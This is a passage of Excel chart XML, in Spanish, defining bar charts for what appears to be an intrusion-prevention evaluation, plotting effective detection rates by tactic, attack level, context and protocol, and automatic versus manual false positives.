            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1209807744"/>
        <c:axId val="1141658584"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1209807744"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Nº Total de Flujos Eficaces Detectados</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1141658584"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1141658584"/>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1501</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209807744"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart80.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>%  PROMEDIO DETECCIÓN EFICAZ FLUJOS/ATAQUES POR TÁCTICA (TP + Colateral)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FA$21</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E06666"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="8"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$21:$EW$34</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FA$22:$FA$35</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FB$21</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="8"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$21:$EW$34</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FB$22:$FB$35</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="638317404"/>
        <c:axId val="1680134628"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="638317404"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1680134628"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1680134628"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.02"/>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638317404"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart8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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques LV1 frente a Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FB$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$38:$EW$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FB$39:$FB$52</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1304445575"/>
        <c:axId val="347575"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1304445575"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="347575"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="347575"/>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Promedio Detección Eficaz Ataques LV1</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304445575"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart8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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques LV2 frente a Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FD$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="9"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$38:$EW$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FD$39:$FD$52</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1840516509"/>
        <c:axId val="824235812"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1840516509"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="824235812"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="824235812"/>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Promedio Detección Eficaz Ataques LV2</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840516509"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart8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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ FLUJOS/ATAQUES POR CONTEXTO DE ATAQUE (TP + Colateral)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FI$22</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FH$23:$FH$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FI$23:$FI$24</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FJ$22</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FH$23:$FH$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FJ$23:$FJ$24</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1073288924"/>
        <c:axId val="1410958116"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1073288924"/>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1410958116"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1410958116"/>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073288924"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart84.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Flujos TP frente a Protocolo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FR$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FQ$11:$FQ$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FR$11:$FR$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="29684815"/>
        <c:axId val="140540428"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="29684815"/>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140540428"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="140540428"/>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Promedio Detección Flujos TP</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29684815"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart85.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos TP frente a Protocolo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FS$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E69138"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FN$11:$FN$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FS$11:$FS$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="349356819"/>
        <c:axId val="2098570078"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="349356819"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="2098570078"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2098570078"/>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Promedio Detección Eficaz Flujos TP</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349356819"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart86.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques TP frente a Protocolo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.030931677018633544"/>
          <c:y val="0.04799196787148595"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$FT$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FN$11:$FN$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FT$11:$FT$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1186375901"/>
        <c:axId val="1727387524"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1186375901"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1727387524"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1727387524"/>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Promedio Detección Eficaz Ataques TP</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186375901"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart87.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual PA Total</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DJ$40</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DN$40</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DJ$40</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DM$40</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="2047531096"/>
        <c:axId val="399483640"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2047531096"/>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399483640"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="399483640"/>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2047531096"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart88.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Manual IPS VS Manual Control Aplicaciones</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Manual IPS</c:v>
          </c:tx>
